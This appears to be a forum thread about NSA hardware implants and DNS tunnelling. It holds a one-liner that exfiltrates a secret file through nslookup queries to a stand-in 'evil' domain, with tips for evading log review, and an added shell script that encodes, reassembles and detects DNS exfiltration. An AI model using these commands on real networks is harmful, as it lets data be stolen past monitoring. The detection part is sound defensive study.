If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.
I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).
Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.
you'd be able to `nslookup foo.com <your special server>` on
You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.
The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).
It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server
It's even easier than that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
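Worked version of the technique described in the comments above (DNS as a channel, the attacker's authoritative server reading the file back out of its query logs), as an added example that is not code from any of the posters. It encodes a file into hostname-safe labels, reassembles it from constructed BIND-style query log lines, and runs a crude detector over the same log. It assumes GNU coreutils (base32, fold), awk, grep -E and sort; the zone ex.example and the log format are placeholders chosen for the example.

```shell
#!/bin/sh
# Added example (not from the thread): a DNS exfiltration encoder, the matching
# decoder run over resolver query logs, and a crude detector for the same logs.
# Assumptions: GNU coreutils (base32, fold), awk, grep -E, sort. The zone
# "ex.example" is a placeholder for an attacker-controlled domain.

EXFIL_DOMAIN="ex.example"  # hypothetical zone whose authoritative server we run
CHUNK=50                   # payload characters per label (DNS labels max 63)

# dns_encode: stdin -> one fully qualified query name per line.
# base32 (a-z2-7) is chosen over base64 because every character is legal in a
# hostname and the alphabet is case-insensitive, so resolvers that randomise
# query case (0x20 encoding) cannot corrupt the payload.  Each chunk carries a
# sequence number so out-of-order, repeated or retried queries can still be
# reassembled from the log.
dns_encode() {
    base32 -w0 | tr -d '=\n' | tr 'A-Z' 'a-z' |
    fold -w "$CHUNK" |
    awk -v d="$EXFIL_DOMAIN" '{ printf "%d.%s.%s\n", NR - 1, $0, d }'
}

# make_log: turn query names into BIND-style query log lines.  These lines are
# constructed for the example; they are not real captures.
make_log() {
    awk '{ printf "03-Mar-2024 10:15:%02d.000 client @0x7f 198.51.100.7#%d (%s): query: %s IN A + (203.0.113.5)\n",
                  NR % 60, 40000 + NR, $1, $1 }'
}

# dns_decode: stdin = resolver log lines -> original bytes on stdout.
# Pulls every "<seq>.<chunk>.<zone>" name, dedupes by sequence number, orders,
# concatenates the chunks, restores base32 padding and decodes.
dns_decode() {
    grep -oE '[0-9]+\.[a-z2-7]+\.'"$EXFIL_DOMAIN" |
    sort -t. -k1,1n -u |
    awk -F. '{ printf "%s", $2 }' |
    awk '{ s = toupper($0); while (length(s) % 8) s = s "="; print s }' |
    base32 -d
}

# dns_detect: stdin = resolver log lines -> "apex queries longest_label" for
# every apex domain whose longest label is >= DET_MAXLABEL characters.
# Treating the last two labels as the apex is a simplification (no public
# suffix list); real detectors also count distinct subdomains per apex and
# label entropy, not just label length.
DET_MAXLABEL=${DET_MAXLABEL:-30}
dns_detect() {
    grep -oE 'query: [^ ]+' | awk '{ print $2 }' |
    awk -F. -v maxlen="$DET_MAXLABEL" '
        NF >= 2 {
            apex = $(NF - 1) "." $NF
            n[apex]++
            for (i = 1; i <= NF - 2; i++)
                if (length($i) > longest[apex]) longest[apex] = length($i)
        }
        END { for (a in n) if (longest[a] + 0 >= maxlen) print a, n[a], longest[a] }'
}

# Round trip on a constructed secret, plus a benign line as noise for the detector.
SECRET='attacker payload: flag{constructed-sample}'
NOISE='03-Mar-2024 10:14:59.000 client @0x7f 198.51.100.8#41000 (www.example.com): query: www.example.com IN A + (203.0.113.5)'

exfil_roundtrip() {
    printf '%s' "$SECRET" | dns_encode | make_log | dns_decode
}

exfil_log() {
    printf '%s\n' "$NOISE"
    printf '%s' "$SECRET" | dns_encode | make_log
}

exfil_roundtrip; echo
exfil_log | dns_detect
```

Two practical notes: the one-liner in the comment above sends base64, whose alphabet includes `+`, `/` and `=` and is case-sensitive, so a resolver that randomises query case will silently corrupt it, which is why the encoder here uses base32. And packing several 63-octet labels into one name (up to 253 octets total) cuts the query count considerably, which matters because the detector side keys on exactly the two things this channel cannot hide: long labels and an unusual number of distinct names under one apex.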
§ 5707 (c)(2): "the implications of [5G] global and regional adoption on
the cyber and espionage threat to the United States, the
interests of the United States, and the cyber and collection
capabilities of the United States;"